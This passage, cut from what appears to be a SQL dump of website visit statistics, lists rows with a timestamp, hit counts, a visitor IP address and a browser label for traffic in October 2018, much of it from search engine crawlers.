1,0,0,'91.196.178.168','chrome'),(315009,1539153504,1,1,0,0,'91.196.178.74','firefox'),(315010,1539153688,1,1,0,0,'95.163.255.97','other'),(315011,1539153974,1,1,0,0,'207.46.13.39','other'),(315012,1539155067,1,1,0,0,'77.111.244.222','chrome'),(315013,1539155215,1,1,0,0,'91.196.178.74','firefox'),(315014,1539155575,1,1,0,0,'8.29.198.27','other'),(315015,1539155642,1,1,0,0,'46.201.125.163','chrome'),(315016,1539155716,1,1,0,0,'37.9.113.103','other'),(315017,1539156803,1,1,0,0,'66.249.64.131','chrome'),(315018,1539156934,1,1,0,0,'46.229.168.143','other'),(315019,1539157200,1,1,0,0,'91.196.178.178','chrome'),(315020,1539157336,2,2,0,0,'178.154.244.29','other'),(315021,1539158176,1,1,0,0,'54.36.148.178','other'),(315022,1539158230,1,1,0,0,'93.170.117.50','chrome'),(315023,1539158288,1,1,0,0,'66.249.64.135','chrome'),(315024,1539158729,1,1,0,0,'193.106.30.98','firefox'),(315025,1539158810,1,1,0,0,'54.36.149.44','other'),(315026,1539159267,1,1,0,0,'54.36.148.145','other'),(315027,1539159283,2,2,0,0,'66.249.64.131','chrome'),(315028,1539159288,1,1,0,0,'66.249.64.135','chrome'),(315029,1539159400,1,1,0,0,'91.196.178.164','chrome'),(315030,1539159797,1,1,0,0,'91.196.178.93','chrome'),(315031,1539160135,1,1,0,0,'66.249.64.137','chrome'),(315032,1539160385,1,1,0,0,'54.36.149.45','other'),(315033,1539160560,1,1,0,0,'66.249.64.131','chrome'),(315034,1539160652,1,1,0,0,'91.196.178.50','chrome'),(315035,1539160721,1,1,0,0,'13.66.139.0','other'),(315036,1539160788,1,1,0,0,'91.196.178.93','chrome'),(315037,1539160821,1,1,0,0,'54.36.148.211','other'),(315038,1539161111,1,1,0,0,'54.36.148.61','other'),(315039,1539161329,1,1,0,0,'54.36.148.45','other'),(315040,1539161618,1,1,0,0,'178.95.255.147','chrome'),(315041,1539161681,1,1,0,0,'8.29.198.27','other'),(315042,1539161907,1,1,0,0,'8.29.198.25','other'),(315043,1539162177,1,1,0,0,'194.37.248.11','chrome'),(315044,1539162194,1,1,0,0,'54.36.148.127','other'),(315045,1539162655,5,5,0,0,'216.244.66.241','other'),(315046,1539162846,1,1,0,0,'91.196.178.50','chrome'),(315047,1539163440,1,1,0,0,'91.196.178.93','chrome'),(315048,1539163546,1,1,0,0,'40.77.167.163','other'),(315049,1539164173,1,1,0,0,'37.147.250.92','msie'),(315050,1539164818,1,1,0,0,'54.36.149.34','other'),(315051,1539165203,1,1,0,0,'91.196.177.110','chrome'),(315052,1539165273,1,1,0,0,'54.36.148.97','other'),(315053,1539165525,1,1,0,0,'54.36.149.97','other'),(315054,1539165808,1,1,0,0,'66.249.64.135','chrome'),(315055,1539166021,1,1,0,0,'66.249.64.219','chrome'),(315056,1539166405,1,1,0,0,'8.29.198.25','other'),(315057,1539167063,1,1,0,0,'54.36.148.175','other'),(315058,1539167136,1,1,0,0,'54.36.149.43','other'),(315059,1539167137,1,1,0,0,'54.36.148.225','other'),(315060,1539167659,1,1,0,0,'54.36.149.90','other'),(315061,1539167764,1,1,0,0,'66.249.64.137','chrome'),(315062,1539167921,1,1,0,0,'178.154.244.11','other'),(315063,1539168048,1,1,0,0,'54.36.148.92','other'),(315064,1539168141,5,5,0,0,'216.244.66.241','other'),(315065,1539168707,1,1,0,0,'54.36.149.0','other'),(315066,1539169177,1,1,0,0,'54.36.148.32','other'),(315067,1539169872,1,1,0,0,'178.255.215.94','other'),(315068,1539169891,1,1,0,0,'40.77.167.10','other'),(315069,1539170513,1,1,0,0,'40.77.167.163','other'),(315070,1539170629,1,1,0,0,'62.122.67.26','chrome'),(315071,1539170807,1,1,0,0,'54.36.149.23','other'),(315072,1539171042,1,1,0,0,'178.154.244.29','other'),(315073,1539171043,1,1,0,0,'178.154.244.11','other'),(315074,1539171069,2,2,0,0,'91.196.178.92','firefox'),(315075,1539171093,1,1,0,0,'216.244.66.241','other'),(315076,1539171135,1,1,0,0,'54.36.149.32','other'),(315077,1539171297,1,1,0,0,'54.36.148.190','other'),(315078,1539171410,1,1,0,0,'46.229.168.142','other'),(315079,1539171430,1,1,0,0,'54.36.148.138','other'),(315080,1539171453,1,1,0,0,'54.36.149.77','other'),(315081,1539171867,1,1,0,0,'180.76.15.150','other'),(315082,1539172173,1,1,0,0,'54.36.148.17','other'),(315083,1539172472,1,1,0,0,'95.108.181.54','other'),(315084,1539172527,2,2,0,0,'8.29.198.27','other'),(315085,1539172633,1,1,0,0,'37.9.113.103','other'),(315086,1539172735,1,1,0,0,'54.36.148.235','other'),(315087,1539172792,3,3,0,0,'5.45.207.79','other'),(315088,1539172902,1,1,0,0,'178.154.244.29','other'),(315089,1539172939,1,1,0,0,'37.9.113.148','other'),(315090,1539173076,1,1,0,0,'54.36.148.170','other'),(315091,1539173086,2,2,0,0,'216.244.66.241','other'),(315092,1539173094,1,1,0,0,'37.9.113.20','other'),(315093,1539173446,2,2,0,0,'178.154.244.11','other'),(315094,1539173476,1,1,0,0,'178.154.171.24','other'),(315095,1539173615,1,1,0,0,'54.36.149.92','other'),(315096,1539173929,1,1,0,0,'54.36.148.88','other'),(315097,1539173945,4,4,0,0,'178.154.244.29','other'),(315098,1539173960,1,1,0,0,'54.36.148.236','other'),(315099,1539174136,1,1,0,0,'193.110.112.162','chrome'),(315100,1539174231,1,1,0,0,'54.36.148.12','other'),(315101,1539174329,1,1,0,0,'54.36.148.163','other'),(315102,1539174334,3,3,0,0,'87.250.224.47','other'),(315103,1539174358,1,1,0,0,'178.154.244.11','other'),(315104,1539174493,1,1,0,0,'5.45.207.19','other'),(315105,1539174602,1,1,0,0,'54.36.149.36','other'),(315106,1539174748,1,1,0,0,'5.45.207.79','other'),(315107,1539174807,1,1,0,0,'178.95.67.148','chrome'),(315108,1539174816,1,1,0,0,'54.36.149.1','other'),(315109,1539174832,1,1,0,0,'91.196.178.164','chrome'),(315110,1539174884,1,1,0,0,'54.36.149.16','other'),(315111,1539174896,1,1,0,0,'213.180.203.9','other'),(315112,1539174906,1,1,0,0,'54.36.148.98','other'),(315113,1539174939,1,1,0,0,'141.8.142.108','other'),(315114,1539175000,2,2,0,0,'178.154.244.29','other'),(315115,1539175431,1,1,0,0,'54.36.148.81','other'),(315116,1539175797,1,1,0,0,'54.36.149.56','other'),(315117,1539175884,1,1,0,0,'54.36.148.209','other'),(315118,1539176133,1,1,0,0,'216.244.66.241','other'),(315119,1539176594,1,1,0,0,'178.154.244.11','other'),(315120,1539176871,1,1,0,0,'54.36.148.186','other'),(315121,1539176899,1,1,0,0,'54.36.149.89','other'),(315122,1539177138,1,1,0,0,'178.154.200.48','other'),(315123,1539177196,1,1,0,0,'5.255.253.38','other'),(315125,1539177199,1,1,0,0,'95.108.181.54','other'),(315126,1539177208,1,1,0,0,'54.36.148.119','other'),(315127,1539177244,1,1,0,0,'8.29.198.26','other'),(315128,1539177572,1,1,0,0,'207.46.13.39','other'),(315129,1539177962,1,1,0,0,'54.36.149.65','other'),(315130,1539178007,1,1,0,0,'54.36.148.165','other'),(315131,1539178076,1,1,0,0,'207.46.13.247','other'),(315132,1539178288,1,1,0,0,'83.170.203.202','chrome'),(315133,1539178378,1,1,0,0,'91.196.178.136','firefox'),(315134,1539178594,2,2,0,0,'216.244.66.241','other'),(315135,1539178697,1,1,0,0,'54.36.148.64','other'),(315136,1539178835,1,1,0,0,'46.211.55.115','other'),(315137,1539178863,1,1,0,0,'54.36.148.46','other'),(315138,1539178926,1,1,0,0,'46.211.38.208','other'),(315139,1539179476,1,1,0,0,'54.36.149.12','other'),(315140,1539179646,1,1,0,0,'91.196.178.92','firefox'),(315141,1539180385,1,1,0,0,'54.36.148.193','other'),(315142,1539181124,1,1,0,0,'54.36.148.70','other'),(315143,1539181236,1,1,0,0,'216.244.66.241','other'),(315144,1539181358,1,1,0,0,'54.36.148.122','other'),(315145,1539181434,1,1,0,0,'54.36.149.44','other'),(315146,1539181537,1,1,0,0,'185.212.171.99','firefox'),(315147,1539182214,1,1,0,0,'188.230.43.254','other'),(315148,1539182359,1,1,0,0,'54.36.148.108','other'),(315149,1539182885,1,1,0,0,'54.36.148.86','other'),(315150,1539182951,1,1,0,0,'66.249.64.28','chrome'),(315151,1539183374,1,1,0,0,'8.29.198.27','other'),(315152,1539183584,1,1,0,0,'8.29.198.26','other'),(315153,1539183792,1,1,0,0,'66.249.64.57','chrome'),(315154,1539184064,1,1,0,0,'54.36.149.23','other'),(315155,1539184368,1,1,0,0,'188.230.43.254','other'),(315156,1539184650,1,1,0,0,'54.36.148.201','other'),(315157,1539185260,1,1,0,0,'62.205.134.182','msie'),(315158,1539185312,1,1,0,0,'54.36.149.34','other'),(315159,1539185652,1,1,0,0,'54.36.148.175','other'),(315160,1539185805,2,2,0,0,'178.154.244.29','other'),(315161,1539185821,1,1,0,0,'54.36.149.72','other'),(315162,1539186405,1,1,0,0,'188.230.43.254','other'),(315163,1539186779,1,1,0,0,'37.54.23.36','chrome'),(315164,1539186853,1,1,0,0,'54.36.148.73','other'),(315165,1539186864,1,1,0,0,'66.249.64.29','chrome'),(315166,1539187165,5,5,0,0,'89.221.216.62','other'),(315167,1539187248,1,1,0,0,'66.249.64.28','chrome'),(315168,1539187343,1,1,0,0,'54.36.149.24','other'),(315169,1539187700,3,3,0,0,'178.154.244.29','other'),(315170,1539187818,1,1,0,0,'54.36.149.6','other'),(315171,1539188073,1,1,0,0,'8.29.198.26','other'),(315172,1539188140,1,1,0,0,'54.36.149.75','other'),(315173,1539188193,1,1,0,0,'54.36.148.236','other'),(315174,1539188491,1,1,0,0,'54.36.148.241','other'),(315175,1539188804,1,1,0,0,'188.230.43.254','other'),(315176,1539188857,1,1,0,0,'54.36.148.40','other'),(315177,1539189065,1,1,0,0,'216.244.66.241','other'),(315178,1539189211,1,1,0,0,'54.36.148.25','other'),(315179,1539189422,1,1,0,0,'66.249.64.14','chrome'),(315180,1539189532,1,1,0,0,'54.36.148.224','other'),(315181,1539189628,1,1,0,0,'54.36.148.198','other'),(315182,1539189846,1,1,0,0,'54.36.148.193','other'),(315183,1539190226,1,1,0,0,'54.36.148.91','other'),(315184,1539190277,1,1,0,0,'54.36.148.80','other'),(315185,1539190349,1,1,0,0,'54.36.148.13','other'),(315186,1539190440,1,1,0,0,'54.36.149.79','other'),(315187,1539190764,1,1,0,0,'207.46.13.39','other'),(315188,1539190996,1,1,0,0,'54.36.148.49','other'),(315189,1539191200,1,1,0,0,'188.230.43.254','other'),(315190,1539191714,1,1,0,0,'91.196.178.74','firefox'),(315191,1539192011,1,1,0,0,'54.36.149.61','other'),(315192,1539192132,1,1,0,0,'66.249.64.57','chrome'),(315193,1539192306,1,1,0,0,'54.36.149.76','other'),(315194,1539192530,2,2,0,0,'66.249.64.29','chrome'),(315195,1539193610,1,1,0,0,'188.230.43.254','other'),(315196,1539193757,1,1,0,0,'54.36.148.46','other'),(315197,1539193940,1,1,0,0,'54.36.148.32','other'),(315198,1539194024,1,1,0,0,'54.36.148.47','other'),(315199,1539194119,1,1,0,0,'54.36.148.169','other'),(315200,1539194221,1,1,0,0,'8.29.198.25','other'),(315201,1539194434,1,1,0,0,'8.29.198.26','other'),(315202,1539194558,1,1,0,0,'54.36.149.29','other'),(315203,1539194744,1,1,0,0,'66.249.64.28','chrome'),(315204,1539194799,1,1,0,0,'180.76.15.19','other'),(315205,1539195097,1,1,0,0,'54.36.148.63','other'),(315206,1539195318,1,1,0,0,'207.46.13.39','other'),(315207,1539195366,2,2,0,0,'54.36.149.70','other'),(315208,1539195836,1,1,0,0,'54.36.149.27','other'),(315209,1539195999,1,1,0,0,'54.36.149.45','other'),(315210,1539196052,1,1,0,0,'54.36.148.125','other'),(315211,1539196269,3,3,0,0,'216.244.66.241','other'),(315212,1539196284,1,1,0,0,'91.196.178.170','chrome'),(315213,1539196603,1,1,0,0,'54.36.148.211','other'),(315214,1539196815,1,1,0,0,'66.249.64.29','chrome'),(315215,1539196827,1,1,0,0,'54.36.148.32','other'),(315216,1539196886,2,2,0,0,'73.44.57.188','chrome'),(315217,1539196906,1,1,0,0,'73.110.46.107','chrome'),(315218,1539197194,1,1,0,0,'54.36.148.254','other'),(315219,1539197291,1,1,0,0,'54.36.149.81','other'),(315220,1539197319,1,1,0,0,'66.249.64.30','chrome'),(315221,1539197362,1,1,0,0,'54.36.148.174','other'),(315222,1539197449,1,1,0,0,'54.36.148.115','other'),(315223,1539197699,1,1,0,0,'54.36.148.10','other'),(315224,1539197706,1,1,0,0,'54.36.148.210','other'),(315225,1539197709,1,1,0,0,'91.196.121.10','chrome'),(315226,1539197761,1,1,0,0,'54.36.148.101','other'),(315227,1539198042,1,1,0,0,'40.77.167.163','other'),(315228,1539198394,1,1,0,0,'54.36.148.99','other'),(315229,1539198489,2,2,0,0,'216.244.66.241','other'),(315230,1539198512,1,1,0,0,'54.36.148.237','other'),(315231,1539198654,1,1,0,0,'54.36.148.60','other'),(315232,1539198676,1,1,0,0,'66.249.64.30','chrome'),(315233,1539198811,1,1,0,0,'54.36.148.120','other'),(315234,1539198838,1,1,0,0,'66.249.64.28','chrome'),(315235,1539198888,1,1,0,0,'54.36.149.33','other'),(315236,1539198910,1,1,0,0,'8.29.198.25','other'),(315237,1539198993,1,1,0,0,'54.36.148.34','other'),(315238,1539199087,1,1,0,0,'54.36.149.19','other'),(315239,1539199152,1,1,0,0,'46.211.51.244','chrome'),(315240,1539199832,6,6,0,0,'62.205.134.182','msie'),(315241,1539200230,1,1,0,0,'66.249.64.28','chrome'),(315242,1539200459,1,1,0,0,'66.249.64.30','chrome'),(315243,1539200984,1,1,0,0,'46.229.168.139','other'),(315244,1539201158,1,1,0,0,'207.46.13.39','other'),(315245,1539201283,1,1,0,0,'40.77.167.163','other'),(315246,1539201414,1,1,0,0,'54.36.149.19','other'),(315247,1539201735,1,1,0,0,'46.211.128.220','chrome'),(315248,1539201854,1,1,0,0,'54.36.148.106','other'),(315249,1539201907,1,1,0,0,'178.154.244.29','other'),(315250,1539201999,2,2,0,0,'66.249.64.30','chrome'),(315251,1539202336,1,1,0,0,'54.36.148.131','other'),(315252,1539203076,1,1,0,0,'54.36.148.208','other'),(315253,1539203355,1,1,0,0,'207.46.13.39','other'),(315254,1539203376,1,1,0,0,'54.36.148.209','other'),(315255,1539203427,1,1,0,0,'54.36.148.45','other'),(315256,1539203431,1,1,0,0,'54.36.149.103','other'),(315257,1539203500,2,2,0,0,'66.249.64.29','chrome'),(315258,1539203568,1,1,0,0,'54.36.149.48','other'),(315259,1539203637,1,1,0,0,'54.36.148.94','other'),(315260,1539203693,1,1,0,0,'46.229.168.132','other'),(315261,1539203818,1,1,0,0,'54.36.149.63','other'),(315262,1539203825,1,1,0,0,'216.244.66.241','other'),(315263,1539204039,1,1,0,0,'66.249.64.30','chrome'),(315264,1539204097,3,3,0,0,'66.249.64.28','chrome'),(315265,1539204197,1,1,0,0,'54.36.148.190','other'),(315266,1539204340,1,1,0,0,'54.36.148.106','other'),(315267,1539204542,1,1,0,0,'180.76.15.32','other'),(315268,1539204904,1,1,0,0,'54.36.149.80','other'),(315269,1539205058,2,2,0,0,'8.29.198.26','other'),(315270,1539205476,1,1,0,0,'40.77.167.163','other'),(315271,1539205497,1,1,0,0,'54.36.149.30','other'),(315272,1539205573,1,1,0,0,'54.36.148.152','other'),(315273,1539205767,1,1,0,0,'66.249.64.28','chrome'),(315274,1539205816,1,1,0,0,'66.249.64.30','chrome'),(315275,1539206465,1,1,0,0,'54.36.148.159','other'),(315276,1539206670,1,1,0,0,'54.36.149.6','other'),(315277,1539207540,1,1,0,0,'54.36.148.125','other'),(315278,1539207583,1,1,0,0,'54.36.148.150','other'),(315279,1539208087,1,1,0,0,'54.36.148.105','other'),(315280,1539208210,1,1,0,0,'54.36.148.61','other'),(315281,1539208428,1,1,0,0,'54.36.148.120','other'),(315282,1539209104,1,1,0,0,'54.36.148.210','other'),(315283,1539209137,1,1,0,0,'54.36.149.27','other'),(315284,1539209271,1,1,0,0,'66.249.64.30','chrome'),(315285,1539209495,1,1,0,0,'54.36.148.134','other'),(315286,1539209704,1,1,0,0,'66.249.64.29','chrome'),(315287,1539209744,1,1,0,0,'8.29.198.26','other'),(315288,1539211008,1,1,0,0,'66.249.64.59','chrome'),(315289,1539211011,1,1,0,0,'54.36.148.87','other'),(315290,1539211250,1,1,0,0,'54.36.148.246','other'),(315291,1539211284,1,1,0,0,'66.249.64.61','chrome'),(315292,1539211465,1,1,0,0,'66.249.64.28','chrome'),(315293,1539211480,1,1,0,0,'54.36.148.42','other'),(315294,1539211601,1,1,0,0,'66.249.64.29','chrome'),(315295,1539211782,1,1,0,0,'54.36.148.125','other'),(315296,1539211955,1,1,0,0,'54.36.148.86','other'),(315297,1539212118,1,1,0,0,'54.36.149.98','other'),(315298,1539212127,1,1,0,0,'185.220.102.7','other'),(315299,1539212366,1,1,0,0,'46.229.168.140','other'),(315300,1539212631,1,1,0,0,'54.36.148.62','other'),(315301,1539212741,1,1,0,0,'66.249.64.57','chrome'),(315302,1539212799,2,2,0,0,'207.46.13.39','other'),(315303,1539212818,1,1,0,0,'54.36.148.45','other'),(315304,1539213156,1,1,0,0,'54.36.148.255','other'),(315305,1539213169,1,1,0,0,'54.36.148.240','other'),(315306,1539213189,1,1,0,0,'66.249.64.30','chrome'),(315307,1539213221,1,1,0,0,'54.36.149.31','other'),(315308,1539213370,1,1,0,0,'66.249.64.28','chrome'),(315309,1539213586,1,1,0,0,'54.36.149.99','other'),(315310,1539213693,1,1,0,0,'46.229.168.132','other'),(315311,1539213891,1,1,0,0,'54.36.148.246','other'),(315312,1539214569,1,1,0,0,'54.36.149.23','other'),(315313,1539214703,1,1,0,0,'216.244.66.241','other'),(315314,1539214705,1,1,0,0,'54.36.149.77','other'),(315315,1539214725,1,1,0,0,'54.36.148.72','other'),(315317,1539214792,1,1,0,0,'54.36.149.34','other'),(315318,1539215899,1,1,0,0,'8.29.198.25','other'),(315319,1539216098,1,1,0,0,'8.29.198.27','other'),(315320,1539216190,1,1,0,0,'54.36.148.29','other'),(315321,1539216320,1,1,0,0,'54.36.149.79','other'),(315322,1539216533,1,1,0,0,'66.249.64.57','chrome'),(315323,1539216548,1,1,0,0,'54.36.148.31','other'),(315324,1539216807,1,1,0,0,'54.36.148.39','other'),(315325,1539216828,1,1,0,0,'54.36.148.151','other'),(315326,1539216888,1,1,0,0,'54.36.148.92','other'),(315327,1539216898,1,1,0,0,'54.36.148.254','other'),(315328,1539217144,1,1,0,0,'54.36.148.88','other'),(315329,1539217236,1,1,0,0,'54.36.149.85','other'),(315330,1539217316,1,1,0,0,'193.106.30.98','firefox'),(315331,1539217346,1,1,0,0,'216.244.66.241','other'),(315332,1539218813,1,1,0,0,'66.249.64.30','chrome'),(315333,1539218996,1,1,0,0,'66.249.64.29','chrome'),(315334,1539219144,1,1,0,0,'54.36.148.131','other'),(315335,1539219452,1,1,0,0,'54.36.148.169','other'),(315336,1539219739,1,1,0,0,'216.244.66.241','other'),(315337,1539219833,1,1,0,0,'66.249.64.28','chrome'),(315338,1539220082,1,1,0,0,'54.36.149.74','other'),(315339,1539220090,1,1,0,0,'54.36.148.143','other'),(315340,1539220250,1,1,0,0,'66.249.64.30','chrome'),(315341,1539220345,1,1,0,0,'46.229.168.146','other'),(315342,1539220350,1,1,0,0,'207.46.13.39','other'),(315343,1539220442,1,1,0,0,'178.154.244.49','other'),(315344,1539220443,1,1,0,0,'178.154.200.48','other'),(315345,1539220579,1,1,0,0,'8.29.198.26','other'),(315346,1539221025,1,1,0,0,'54.36.148.85','other'),(315347,1539221504,1,1,0,0,'54.36.148.140','other'),(315348,1539222052,1,1,0,0,'54.36.148.250','other'),(315349,1539222369,1,1,0,0,'54.36.148.165','other'),(315350,1539222402,1,1,0,0,'54.36.149.17','other'),(315351,1539222987,1,1,0,0,'54.36.149.91','other'),(315352,1539223198,1,1,0,0,'66.249.64.57','chrome'),(315353,1539223281,1,1,0,0,'54.36.148.228','other'),(315354,1539223413,1,1,0,0,'207.46.13.39','other'),(315355,1539223976,1,1,0,0,'66.249.64.29','chrome'),(315356,1539224908,1,1,0,0,'54.36.149.34','other'),(315357,1539224942,1,1,0,0,'54.36.149.71','other'),(315358,1539225110,1,1,0,0,'207.46.13.39','other'),(315359,1539225162,1,1,0,0,'95.135.207.244','chrome'),(315360,1539225485,1,1,0,0,'87.250.224.47','other'),(315361,1539225620,1,1,0,0,'54.36.148.252','other'),(315362,1539225654,2,2,0,0,'178.154.244.29','other'),(315363,1539225738,1,1,0,0,'141.8.142.103','other'),(315364,1539225748,1,1,0,0,'54.36.148.66','other'),(315365,1539225771,1,1,0,0,'54.36.149.82','other'),(315366,1539226209,1,1,0,0,'54.36.149.93','other'),(315367,1539226210,1,1,0,0,'54.36.148.180','other'),(315368,1539226300,2,2,0,0,'178.154.244.11','other'),(315369,1539226429,1,1,0,0,'5.45.207.79','other'),(315370,1539226489,1,1,0,0,'37.9.113.148','other'),(315371,1539226731,1,1,0,0,'8.29.198.27','other'),(315372,1539226890,1,1,0,0,'54.36.148.10','other'),(315373,1539226933,1,1,0,0,'8.29.198.25','other'),(315374,1539227267,3,3,0,0,'216.244.66.241','other'),(315375,1539227506,1,1,0,0,'178.154.244.11','other'),(315376,1539227543,5,5,0,0,'178.154.244.29','other'),(315377,1539227866,1,1,0,0,'54.36.148.172','other'),(315378,1539229091,1,1,0,0,'178.154.244.29','other'),(315379,1539229110,2,2,0,0,'178.154.244.11','other'),(315380,1539229123,1,1,0,0,'66.249.64.30','chrome'),(315381,1539229378,1,1,0,0,'54.36.149.39','other'),(315382,1539229470,1,1,0,0,'54.36.149.2','other'),(315383,1539229685,1,1,0,0,'54.36.148.133','other'),(315384,1539230008,2,2,0,0,'178.154.244.29','other'),(315385,1539230015,1,1,0,0,'54.36.148.252','other'),(315386,1539230058,1,1,0,0,'216.244.66.241','other'),(315387,1539230155,1,1,0,0,'54.36.148.189','other'),(315388,1539230321,1,1,0,0,'54.36.148.185','other'),(315389,1539230338,1,1,0,0,'46.229.168.130','other'),(315390,1539230517,1,1,0,0,'54.36.149.2','other'),(315391,1539230826,1,1,0,0,'54.36.148.103','other'),(315392,1539231018,2,2,0,0,'66.249.64.30','chrome'),(315393,1539231135,1,1,0,0,'178.154.244.29','other'),(315394,1539231148,1,1,0,0,'5.45.207.19','other'),(315395,1539231241,1,1,0,0,'54.36.148.62','other'),(315396,1539231416,1,1,0,0,'8.29.198.27','other'),(315397,1539231986,1,1,0,0,'54.36.148.206','other'),(315398,1539232268,1,1,0,0,'178.154.244.29','other'),(315399,1539232438,1,1,0,0,'54.36.149.20','other'),(315400,1539232440,1,1,0,0,'54.36.149.9','other'),(315401,1539232678,1,1,0,0,'216.244.66.241','other'),(315402,1539233578,1,1,0,0,'54.36.148.123','other'),(315403,1539233704,1,1,0,0,'54.36.149.23','other'),(315404,1539233706,1,1,0,0,'54.36.148.251','other'),(315405,1539233809,1,1,0,0,'54.36.148.141','other'),(315406,1539234031,1,1,0,0,'54.36.148.87','other'),(315407,1539234069,1,1,0,0,'178.154.244.29','other'),(315408,1539234176,1,1,0,0,'54.36.149.64','other'),(315409,1539234703,1,1,0,0,'54.36.149.23','other'),(315410,1539235205,1,1,0,0,'54.36.148.69','other'),(315411,1539235247,1,1,0,0,'54.36.148.63','other'),(315412,1539235633,1,1,0,0,'54.36.148.238','other'),(315413,1539235679,1,1,0,0,'40.77.167.150','other'),(315414,1539235707,1,1,0,0,'54.36.149.106','other'),(315415,1539236164,1,1,0,0,'5.255.253.38','other'),(315416,1539236308,1,1,0,0,'66.249.64.29','chrome'),(315417,1539236406,1,1,0,0,'66.249.64.28','chrome'),(315418,1539236483,1,1,0,0,'178.154.171.24','other'),(315419,1539236516,1,1,0,0,'54.36.149.43','other'),(315420,1539236526,1,1,0,0,'178.154.200.48','other'),(315421,1539236568,1,1,0,0,'91.196.178.86','firefox'),(315422,1539236582,1,1,0,0,'37.9.113.148','other'),(315423,1539236604,1,1,0,0,'54.36.148.33','other'),(315424,1539236627,1,1,0,0,'216.244.66.241','other'),(315425,1539237194,1,1,0,0,'95.163.255.99','other'),(315426,1539237568,1,1,0,0,'8.29.198.25','other'),(315427,1539237762,1,1,0,0,'54.36.148.29','other'),(315428,1539237769,1,1,0,0,'8.29.198.27','other'),(315429,1539237912,1,1,0,0,'54.36.148.152','other'),(315430,1539238363,1,1,0,0,'54.36.148.19','other'),(315431,1539238383,3,3,0,0,'66.249.64.30','chrome'),(315432,1539238443,1,1,0,0,'54.36.149.3','other'),(315433,1539238604,1,1,0,0,'54.36.149.63','other'),(315434,1539238754,1,1,0,0,'54.36.148.125','other'),(315435,1539238809,1,1,0,0,'66.249.64.29','chrome'),(315436,1539238953,1,1,0,0,'66.249.64.28','chrome'),(315437,1539238995,1,1,0,0,'54.36.149.11','other'),(315438,1539239011,1,1,0,0,'54.36.148.70','other'),(315439,1539239153,1,1,0,0,'91.196.178.189','chrome'),(315440,1539239349,1,1,0,0,'54.36.148.252','other'),(315441,1539239612,1,1,0,0,'54.36.148.192','other'),(315442,1539239738,1,1,0,0,'54.36.148.62','other'),(315443,1539239938,1,1,0,0,'54.36.148.241','other'),(315444,1539239946,1,1,0,0,'54.36.149.73','other'),(315445,1539239968,1,1,0,0,'91.196.178.72','chrome'),(315446,1539240222,1,1,0,0,'62.80.186.31','chrome'),(315447,1539240369,1,1,0,0,'216.244.66.241','other'),(315448,1539240388,1,1,0,0,'54.36.149.90','other'),(315449,1539240410,1,1,0,0,'54.36.148.145','other'),(315450,1539240478,1,1,0,0,'66.249.64.28','chrome'),(315451,1539240554,1,1,0,0,'54.36.149.66','other'),(315452,1539240592,1,1,0,0,'54.36.148.32','other'),(315453,1539241289,1,1,0,0,'66.249.64.30','chrome'),(315454,1539241292,1,1,0,0,'66.249.64.29','chrome'),(315455,1539241308,1,1,0,0,'54.36.148.193','other'),(315456,1539241674,1,1,0,0,'54.36.148.189','other'),(315457,1539241785,1,1,0,0,'54.36.148.229','other'),(315458,1539241841,1,1,0,0,'207.46.13.39','other'),(315459,1539241953,1,1,0,0,'54.36.148.249','other'),(315460,1539242248,2,2,0,0,'91.196.177.26','chrome'),(315461,1539242256,1,1,0,0,'8.29.198.27','other'),(315462,1539242258,1,1,0,0,'54.36.149.75','other'),(315463,1539242377,1,1,0,0,'54.36.148.155','other'),(315464,1539242424,4,4,0,0,'216.244.66.241','other'),(315465,1539242603,1,1,0,0,'54.36.149.74','other'),(315466,1539242618,1,1,0,0,'54.36.149.95','other'),(315467,1539242631,1,1,0,0,'40.77.167.150','other'),(315468,1539242643,1,1,0,0,'91.196.178.183','chrome'),(315469,1539242702,2,2,0,0,'54.165.59.7','other'),(315470,1539242720,1,1,0,0,'95.132.21.215','firefox'),(315471,1539242724,1,1,0,0,'91.196.178.88','chrome'),(315472,1539242800,1,1,0,0,'91.196.178.178','chrome'),(315473,1539243332,1,1,0,0,'66.249.64.28','chrome'),(315474,1539243356,1,1,0,0,'180.76.15.23','other'),(315475,1539243833,1,1,0,0,'54.36.149.77','other'),(315476,1539243845,1,1,0,0,'54.36.148.79','other'),(315477,1539244071,2,2,0,0,'207.46.13.39','other'),(315478,1539244115,1,1,0,0,'54.36.148.146','other'),(315479,1539244117,1,1,0,0,'46.229.168.130','other'),(315480,1539244910,1,1,0,0,'54.36.148.123','other'),(315481,1539245057,2,2,0,0,'216.244.66.241','other'),(315482,1539245370,1,1,0,0,'54.36.148.69','other'),(315483,1539245419,1,1,0,0,'54.36.148.234','other'),(315484,1539245488,1,1,0,0,'54.36.148.228','other'),(315485,1539246162,1,1,0,0,'54.36.149.1','other'),(315486,1539246549,1,1,0,0,'54.36.148.226','other'),(315487,1539246577,1,1,0,0,'54.36.149.71','other'),(315488,1539246590,1,1,0,0,'91.196.178.77','firefox'),(315489,1539247202,1,1,0,0,'95.163.255.95','other'),(315490,1539247490,3,3,0,0,'91.196.178.72','chrome'),(315491,1539247511,1,1,0,0,'54.36.149.102','other'),(315492,1539247611,1,1,0,0,'46.229.168.130','other'),(315493,1539247615,3,3,0,0,'216.244.66.241','other'),(315494,1539247688,1,1,0,0,'54.36.148.103','other'),(315495,1539247980,2,2,0,0,'91.196.177.46','chrome'),(315496,1539248011,1,1,0,0,'54.36.148.98','other'),(315497,1539248034,1,1,0,0,'66.249.64.61','chrome'),(315498,1539248096,1,1,0,0,'54.36.148.93','other'),(315499,1539248139,1,1,0,0,'54.36.148.34','other'),(315500,1539248399,1,1,0,0,'54.36.148.144','other'),(315501,1539248403,2,2,0,0,'8.29.198.27','other'),(315502,1539248508,1,1,0,0,'91.196.178.72','chrome'),(315503,1539248576,1,1,0,0,'54.36.148.35','other'),(315504,1539248661,1,1,0,0,'66.102.9.35','chrome'),(315505,1539248748,1,1,0,0,'54.36.148.123','other'),(315506,1539249267,1,1,0,0,'54.36.148.185','other'),(315507,1539249294,1,1,0,0,'54.36.148.227','other'),(315508,1539249351,1,1,0,0,'54.36.148.155','other'),(315509,1539249429,1,1,0,0,'54.36.149.92','other'),(315510,1539249449,1,1,0,0,'54.36.148.59','other'),(315511,1539249805,1,1,0,0,'54.36.148.19','other'),(315512,1539249936,1,1,0,0,'91.196.178.72','chrome'),(315513,1539250187,1,1,0,0,'216.244.66.241','other'),(315514,1539250225,1,1,0,0,'54.36.149.103','other'),(315515,1539250368,1,1,0,0,'54.36.148.141','other'),(315516,1539250466,1,1,0,0,'54.36.148.151','other'),(315517,1539250535,1,1,0,0,'54.36.148.253','other'),(315518,1539250726,1,1,0,0,'54.36.149.1','other'),(315519,1539250992,1,1,0,0,'54.36.148.95','other'),(3